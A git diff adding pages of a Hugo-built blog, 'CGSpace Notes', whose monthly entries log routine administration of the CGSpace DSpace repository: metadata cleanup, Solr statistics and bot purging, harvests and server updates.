+ Read more → +
+ + + + + + +
+
+

December, 2022

+ +
+

2022-12-01

+
    +
  • Fix some incorrect regions on CGSpace +
      +
    • I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions (roughly as sketched after this list)
    • +
    +
  • +
  • Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!
  • +
  • Replace “East Asia” with “Eastern Asia” region on CGSpace (UN M.49 region)
  • +
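A rough sketch of that workflow (the file names and metadata column names are hypothetical, and the csv-metadata-quality options are assumed from memory):
$ csvcut -c 'id,cg.coverage.country[en_US],cg.coverage.region[en_US]' /tmp/ccafs.csv > /tmp/ccafs-regions.csv
$ csv-metadata-quality -i /tmp/ccafs-regions.csv -o /tmp/ccafs-regions-fixed.csv -u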
+ Read more → +
+ + + + + + +
+
+

November, 2022

+ +
+

2022-11-01

+
    +
  • Last night I re-synced DSpace 7 Test from CGSpace +
      +
    • I also updated all my local 7_x-dev branches on the latest upstreams
    • +
    +
  • +
  • I spent some time updating the authorizations in Alliance collections +
      +
    • I want to make sure they use groups instead of individuals where possible!
    • +
    +
  • +
  • I reverted the Cocoon autosave change because it was more of a nuisance (Peter can’t upload CSVs from the web interface) than it was worth for such a low severity security issue
  • +
+ Read more → +
+ + + + + + + + + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/posts/index.xml b/docs/posts/index.xml new file mode 100644 index 000000000..5f4165c24 --- /dev/null +++ b/docs/posts/index.xml @@ -0,0 +1,1907 @@ + + + + Posts on CGSpace Notes + https://alanorth.github.io/cgspace-notes/posts/ + Recent content in Posts on CGSpace Notes + Hugo -- gohugo.io + en-us + Sat, 01 Jul 2023 17:14:36 +0300 + + July, 2023 + https://alanorth.github.io/cgspace-notes/2023-07/ + Sat, 01 Jul 2023 17:14:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-07/ + 2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &ldquo;Copyrighted; all rights reserved&rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&rsquo;s usually copyrighted (could still be open access, but we can&rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&rsquo;t like the Impact Area icons as a component because they don&rsquo;t have any visual meaning + + + + June, 2023 + https://alanorth.github.io/cgspace-notes/2023-06/ + Fri, 02 Jun 2023 10:29:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-06/ + <h2 id="2023-06-02">2023-06-02</h2> +<ul> +<li>Spend some time testing my <code>post_bitstreams.py</code> script to update thumbnails for items on CGSpace +<ul> +<li>Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&hellip;</li> +</ul> +</li> +<li>Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace +<ul> +<li>They have experience with improving the MODS interface in MELSpace&rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace</li> +<li>From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk</li> +</ul> +</li> +</ul> + + + + May, 2023 + https://alanorth.github.io/cgspace-notes/2023-05/ + Wed, 03 May 2023 08:53:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-05/ + <h2 id="2023-05-03">2023-05-03</h2> +<ul> +<li>Alliance&rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace +<ul> +<li>It seems their password expired, which is annoying</li> +</ul> +</li> +<li>I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week +<ul> +<li>There are many of our subjects that would match if they added a &ldquo;-&rdquo; like &ldquo;high yielding varieties&rdquo; or used singular&hellip;</li> +<li>Also I found at least two spelling mistakes, for example &ldquo;decison support systems&rdquo;, which would match if it was spelled correctly</li> +</ul> +</li> 
+<li>Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace</li> +</ul> + + + + April, 2023 + https://alanorth.github.io/cgspace-notes/2023-04/ + Sun, 02 Apr 2023 08:19:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-04/ + <h2 id="2023-04-02">2023-04-02</h2> +<ul> +<li>Run all system updates on CGSpace and reboot it</li> +<li>I exported CGSpace to CSV to check for any missing Initiative collection mappings +<ul> +<li>I also did a check for missing country/region mappings with csv-metadata-quality</li> +</ul> +</li> +<li>Start a harvest on AReS</li> +</ul> + + + + March, 2023 + https://alanorth.github.io/cgspace-notes/2023-03/ + Wed, 01 Mar 2023 07:58:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-03/ + <h2 id="2023-03-01">2023-03-01</h2> +<ul> +<li>Remove <code>cg.subject.wle</code> and <code>cg.identifier.wletheme</code> from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)</li> +<li><a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28">iso-codes 4.13.0 was released</a>, which incorporates my changes to the common names for Iran, Laos, and Syria</li> +<li>I finally got through with porting the input form from DSpace 6 to DSpace 7</li> +</ul> + + + + February, 2023 + https://alanorth.github.io/cgspace-notes/2023-02/ + Wed, 01 Feb 2023 10:57:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-02/ + <h2 id="2023-02-01">2023-02-01</h2> +<ul> +<li>Export CGSpace to cross check the DOI metadata with Crossref +<ul> +<li>I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&hellip;</li> +</ul> +</li> +</ul> + + + + January, 2023 + https://alanorth.github.io/cgspace-notes/2023-01/ + Sun, 01 Jan 2023 08:44:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-01/ + <h2 id="2023-01-01">2023-01-01</h2> +<ul> +<li>Apply some more ORCID identifiers to items on CGSpace using my <code>2022-09-22-add-orcids.csv</code> file +<ul> +<li>I want to update all ORCID names and refresh them in the database</li> +<li>I see we have some new ones that aren&rsquo;t in our list if I combine with this file:</li> +</ul> +</li> +</ul> + + + + December, 2022 + https://alanorth.github.io/cgspace-notes/2022-12/ + Thu, 01 Dec 2022 08:52:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-12/ + <h2 id="2022-12-01">2022-12-01</h2> +<ul> +<li>Fix some incorrect regions on CGSpace +<ul> +<li>I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions</li> +</ul> +</li> +<li>Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!</li> +<li>Replace &ldquo;East Asia&rdquo; with &ldquo;Eastern Asia&rdquo; region on CGSpace (UN M.49 region)</li> +</ul> + + + + November, 2022 + https://alanorth.github.io/cgspace-notes/2022-11/ + Tue, 01 Nov 2022 09:11:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-11/ + <h2 id="2022-11-01">2022-11-01</h2> +<ul> +<li>Last night I re-synced DSpace 7 Test from CGSpace +<ul> +<li>I also updated all my local <code>7_x-dev</code> branches on the latest upstreams</li> +</ul> +</li> +<li>I spent some time updating the authorizations in Alliance collections +<ul> +<li>I want to make sure they use groups instead of individuals where possible!</li> +</ul> +</li> +<li>I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&rsquo;t 
upload CSVs from the web interface and is a very low severity security issue</li> +</ul> + + + + October, 2022 + https://alanorth.github.io/cgspace-notes/2022-10/ + Sat, 01 Oct 2022 19:45:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-10/ + <h2 id="2022-10-01">2022-10-01</h2> +<ul> +<li>Start a harvest on AReS last night</li> +<li>Yesterday I realized how to use <a href="https://im4java.sourceforge.net/docs/dev-guide.html">GraphicsMagick with im4java</a> and I want to re-visit some of my thumbnail tests +<ul> +<li>I&rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8</li> +<li>I filed <a href="https://github.com/criteo/JVips/issues/141">an issue to ask about Java 11+ support</a></li> +</ul> +</li> +</ul> + + + + September, 2022 + https://alanorth.github.io/cgspace-notes/2022-09/ + Thu, 01 Sep 2022 09:41:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-09/ + <h2 id="2022-09-01">2022-09-01</h2> +<ul> +<li>A bit of work on the &ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&rdquo; spreadsheet</li> +<li>I tested an item submission on DSpace Test with the Cocoon <code>org.apache.cocoon.uploads.autosave=false</code> change +<ul> +<li>The submission works as expected</li> +</ul> +</li> +<li>Start debugging some region-related issues with csv-metadata-quality +<ul> +<li>I created a new test file <code>test-geography.csv</code> with some different scenarios</li> +<li>I also fixed a few bugs and improved the region-matching logic</li> +</ul> +</li> +</ul> + + + + August, 2022 + https://alanorth.github.io/cgspace-notes/2022-08/ + Mon, 01 Aug 2022 10:22:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-08/ + <h2 id="2022-08-01">2022-08-01</h2> +<ul> +<li>Our request to add <a href="https://github.com/spdx/license-list-XML/issues/1525">CC-BY-3.0-IGO to SPDX</a> was approved a few weeks ago</li> +</ul> + + + + July, 2022 + https://alanorth.github.io/cgspace-notes/2022-07/ + Sat, 02 Jul 2022 14:07:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-07/ + <h2 id="2022-07-02">2022-07-02</h2> +<ul> +<li>I learned how to use the Levenshtein functions in PostgreSQL +<ul> +<li>The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing</li> +<li>Also, the trgm functions I&rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first</li> +</ul> +</li> +</ul> + + + + June, 2022 + https://alanorth.github.io/cgspace-notes/2022-06/ + Mon, 06 Jun 2022 09:01:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-06/ + <h2 id="2022-06-06">2022-06-06</h2> +<ul> +<li>Look at the Solr statistics on CGSpace +<ul> +<li>I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &ldquo;msnbot-&rdquo; using the Solr query <code>dns:*msnbot* AND dns:*.msn.com</code></li> +<li>I purged these first so I could see the other &ldquo;real&rdquo; IPs in the Solr facets</li> +</ul> +</li> +<li>I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent</li> +<li>I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent</li> +<li>I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent +<ul> +<li>There seem to be many more of these:</li> +</ul> +</li> +</ul> + + + + May, 2022 + https://alanorth.github.io/cgspace-notes/2022-05/ + Wed, 04 May 2022 09:13:39 +0300 + + 
https://alanorth.github.io/cgspace-notes/2022-05/ + <h2 id="2022-05-04">2022-05-04</h2> +<ul> +<li>I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too: +<ul> +<li>18.207.136.176</li> +<li>185.189.36.248</li> +<li>50.118.223.78</li> +<li>52.70.76.123</li> +<li>3.236.10.11</li> +</ul> +</li> +<li>Looking at the Solr statistics for 2022-04 +<ul> +<li>52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests</li> +<li>64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc</li> +<li>185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt</li> +<li>157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li> +<li>52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li> +<li>157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li> +<li>207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li> +<li>If I query Solr for <code>time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.</code> I see a handful of IPs that made 41,000 requests</li> +</ul> +</li> +<li>I purged 93,974 hits from these IPs using my <code>check-spider-ip-hits.sh</code> script</li> +</ul> + + + + April, 2022 + https://alanorth.github.io/cgspace-notes/2022-04/ + Fri, 01 Apr 2022 10:53:39 +0300 + + https://alanorth.github.io/cgspace-notes/2022-04/ + 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54. 
+ + + + March, 2022 + https://alanorth.github.io/cgspace-notes/2022-03/ + Tue, 01 Mar 2022 16:46:54 +0300 + + https://alanorth.github.io/cgspace-notes/2022-03/ + <h2 id="2022-03-01">2022-03-01</h2> +<ul> +<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv +</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv +</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv +</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv +</span></span></code></pre></div> + + + + February, 2022 + https://alanorth.github.io/cgspace-notes/2022-02/ + Tue, 01 Feb 2022 14:06:54 +0200 + + https://alanorth.github.io/cgspace-notes/2022-02/ + <h2 id="2022-02-01">2022-02-01</h2> +<ul> +<li>Meeting with Peter and Abenet about CGSpace in the One CGIAR +<ul> +<li>We agreed to buy $5,000 worth of credits from Atmire for future upgrades</li> +<li>We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization</li> +<li>We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one</li> +<li>We agreed to try to do more alignment of affiliations/funders with ROR</li> +</ul> +</li> +</ul> + + + + January, 2022 + https://alanorth.github.io/cgspace-notes/2022-01/ + Sat, 01 Jan 2022 15:20:54 +0200 + + https://alanorth.github.io/cgspace-notes/2022-01/ + <h2 id="2022-01-01">2022-01-01</h2> +<ul> +<li>Start a full harvest on AReS</li> +</ul> + + + + December, 2021 + https://alanorth.github.io/cgspace-notes/2021-12/ + Wed, 01 Dec 2021 16:07:07 +0200 + + https://alanorth.github.io/cgspace-notes/2021-12/ + <h2 id="2021-12-01">2021-12-01</h2> +<ul> +<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li> +<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p +</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics +</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics +</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics +</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"> +</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 +</span></span></code></pre></div> + + + + November, 2021 + https://alanorth.github.io/cgspace-notes/2021-11/ + Tue, 
02 Nov 2021 22:27:07 +0200 + + https://alanorth.github.io/cgspace-notes/2021-11/ + <h2 id="2021-11-02">2021-11-02</h2> +<ul> +<li>I experimented with manually sharding the Solr statistics on DSpace Test</li> +<li>First I exported all the 2019 stats from CGSpace:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid +</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json +</span></span></code></pre></div> + + + + October, 2021 + https://alanorth.github.io/cgspace-notes/2021-10/ + Fri, 01 Oct 2021 11:14:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-10/ + <h2 id="2021-10-01">2021-10-01</h2> +<ul> +<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili +</span></span><span style="display:flex;"><span>ations-matching.csv +</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l +</span></span><span style="display:flex;"><span>1879 +</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt +</span></span></code></pre></div><ul> +<li>So we have 1879/7100 (26.46%) matching already</li> +</ul> + + + + September, 2021 + https://alanorth.github.io/cgspace-notes/2021-09/ + Wed, 01 Sep 2021 09:14:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-09/ + <h2 id="2021-09-02">2021-09-02</h2> +<ul> +<li>Troubleshooting the missing Altmetric scores on AReS +<ul> +<li>Turns out that I didn&rsquo;t actually fix them last month because the check for <code>content.altmetric</code> still exists, and I can&rsquo;t access the DOIs using <code>_h.source.DOI</code> for some reason</li> +<li>I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!</li> +<li>I will change <code>DOI</code> to <code>tomato</code> in the repository setup and start a re-harvest&hellip; I need to see if this is some kind of reserved word or something&hellip;</li> +<li>Even as <code>tomato</code> I can&rsquo;t access that field as <code>_h.source.tomato</code> in Angular, but it does work as a filter source&hellip; sigh</li> +</ul> +</li> +<li>I&rsquo;m having problems using the OpenRXV API +<ul> +<li>The syntax Moayad showed me last month doesn&rsquo;t seem to honor the 
search query properly&hellip;</li> +</ul> +</li> +</ul> + + + + August, 2021 + https://alanorth.github.io/cgspace-notes/2021-08/ + Sun, 01 Aug 2021 09:01:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-08/ + <h2 id="2021-08-01">2021-08-01</h2> +<ul> +<li>Update Docker images on AReS server (linode20) and reboot the server:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull +</span></span></code></pre></div><ul> +<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li> +</ul> + + + + July, 2021 + https://alanorth.github.io/cgspace-notes/2021-07/ + Thu, 01 Jul 2021 08:53:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-07/ + <h2 id="2021-07-01">2021-07-01</h2> +<ul> +<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>COPY 20994 +</span></span></code></pre></div> + + + + June, 2021 + https://alanorth.github.io/cgspace-notes/2021-06/ + Tue, 01 Jun 2021 10:51:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-06/ + <h2 id="2021-06-01">2021-06-01</h2> +<ul> +<li>IWMI notified me that AReS was down with an HTTP 502 error +<ul> +<li>Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification</li> +<li>I don&rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the <code>angular_nginx</code> container isn&rsquo;t running</li> +<li>I simply started it and AReS was running again:</li> +</ul> +</li> +</ul> + + + + May, 2021 + https://alanorth.github.io/cgspace-notes/2021-05/ + Sun, 02 May 2021 09:50:54 +0300 + + https://alanorth.github.io/cgspace-notes/2021-05/ + <h2 id="2021-05-01">2021-05-01</h2> +<ul> +<li>I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents: +<ul> +<li>&ldquo;RI/1.0&rdquo;, 1337</li> +<li>&ldquo;Microsoft Office Word 2014&rdquo;, 941</li> +</ul> +</li> +<li>I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;</li> +</ul> + + + + April, 2021 + https://alanorth.github.io/cgspace-notes/2021-04/ + Thu, 01 Apr 2021 09:50:54 +0300 + + https://alanorth.github.io/cgspace-notes/2021-04/ + <h2 id="2021-04-01">2021-04-01</h2> +<ul> +<li>I wrote a script to query Sherpa&rsquo;s API for our ISSNs: <code>sherpa-issn-lookup.py</code> +<ul> +<li>I&rsquo;m curious to see how the results compare with the results from Crossref 
yesterday</li> +</ul> +</li> +<li>AReS Explorer was down since this morning, I didn&rsquo;t see anything in the systemd journal +<ul> +<li>I simply took everything down with docker-compose and then back up, and then it was OK</li> +<li>Perhaps one of the containers crashed, I should have looked closer but I was in a hurry</li> +</ul> +</li> +</ul> + + + + March, 2021 + https://alanorth.github.io/cgspace-notes/2021-03/ + Mon, 01 Mar 2021 10:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2021-03/ + <h2 id="2021-03-01">2021-03-01</h2> +<ul> +<li>Discuss some OpenRXV issues with Abdullah from CodeObia +<ul> +<li>He&rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API</li> +<li>Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies</li> +</ul> +</li> +</ul> + + + + CGSpace CG Core v2 Migration + https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/ + Sun, 21 Feb 2021 13:27:35 +0200 + + https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/ + <p>Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.</p> +<p>With reference to <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2 draft standard</a> by Marie-Angélique as well as <a href="http://www.dublincore.org/specifications/dublin-core/dcmi-terms/">DCMI DCTERMS</a>.</p> + + + + February, 2021 + https://alanorth.github.io/cgspace-notes/2021-02/ + Mon, 01 Feb 2021 10:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2021-02/ + <h2 id="2021-02-01">2021-02-01</h2> +<ul> +<li>Abenet said that CIP found more duplicate records in their export from AReS +<ul> +<li>I re-opened <a href="https://github.com/ilri/OpenRXV/issues/67">the issue</a> on OpenRXV where we had previously noticed this</li> +<li>The shared link where the duplicates are is here: <a href="https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6">https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6</a></li> +</ul> +</li> +<li>I had a call with CodeObia to discuss the work on OpenRXV</li> +<li>Check the results of the AReS harvesting from last night:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> +</span></span><span style="display:flex;"><span>{ +</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875, +</span></span><span style="display:flex;"><span> &#34;_shards&#34; : { +</span></span><span style="display:flex;"><span> &#34;total&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0, +</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0 +</span></span><span style="display:flex;"><span> } +</span></span><span style="display:flex;"><span>} +</span></span></code></pre></div> + + + + January, 2021 + https://alanorth.github.io/cgspace-notes/2021-01/ + Sun, 03 Jan 2021 10:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2021-01/ + <h2 id="2021-01-03">2021-01-03</h2> +<ul> +<li>Peter notified me that some filters on AReS were broken again +<ul> +<li>It&rsquo;s the same issue with the field 
names getting <code>.keyword</code> appended to the end that I already <a href="https://github.com/ilri/OpenRXV/issues/66">filed an issue on OpenRXV about last month</a></li> +<li>I fixed the broken filters (careful to not edit any others, lest they break too!)</li> +</ul> +</li> +<li>Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV +<ul> +<li>The start page had been &ldquo;1&rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API</li> +<li>I adjusted it to default to 0 and added a note to the admin screen</li> +<li>I realized that this issue was actually causing the first page of 100 statistics to be missing&hellip;</li> +<li>For example, <a href="https://cgspace.cgiar.org/handle/10568/66839">this item</a> has 51 views on CGSpace, but 0 on AReS</li> +</ul> +</li> +</ul> + + + + December, 2020 + https://alanorth.github.io/cgspace-notes/2020-12/ + Tue, 01 Dec 2020 11:32:54 +0200 + + https://alanorth.github.io/cgspace-notes/2020-12/ + <h2 id="2020-12-01">2020-12-01</h2> +<ul> +<li>Atmire responded about the issue with duplicate data in our Solr statistics +<ul> +<li>They noticed that some records in the statistics-2015 core haven&rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&rsquo;t migrated any of the records yet</li> +<li>That&rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the <code>cua_version</code> field</li> +<li>I started processing those (about 411,000 records):</li> +</ul> +</li> +</ul> + + + + CGSpace DSpace 6 Upgrade + https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/ + Sun, 15 Nov 2020 13:27:35 +0200 + + https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/ + <p>Notes about the DSpace 6 upgrade on CGSpace in 2020-11.</p> + + + + November, 2020 + https://alanorth.github.io/cgspace-notes/2020-11/ + Sun, 01 Nov 2020 13:11:54 +0200 + + https://alanorth.github.io/cgspace-notes/2020-11/ + <h2 id="2020-11-01">2020-11-01</h2> +<ul> +<li>Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test +<ul> +<li>So far we&rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&hellip; wow.</li> +</ul> +</li> +</ul> + + + + October, 2020 + https://alanorth.github.io/cgspace-notes/2020-10/ + Tue, 06 Oct 2020 16:55:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-10/ + <h2 id="2020-10-06">2020-10-06</h2> +<ul> +<li>Add tests for the new <code>/items</code> POST handlers to the DSpace 6.x branch of my <a href="https://github.com/ilri/dspace-statistics-api/tree/v6_x">dspace-statistics-api</a> +<ul> +<li>It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available</li> +<li>Tag and release version 1.3.0 on GitHub: <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0">https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0</a></li> +</ul> +</li> +<li>Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump +<ul> +<li>During the FlywayDB migration I got an error:</li> +</ul> +</li> +</ul> + + + + September, 2020 + https://alanorth.github.io/cgspace-notes/2020-09/ + Wed, 02 Sep 2020 15:35:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-09/ + <h2 id="2020-09-02">2020-09-02</h2> +<ul> 
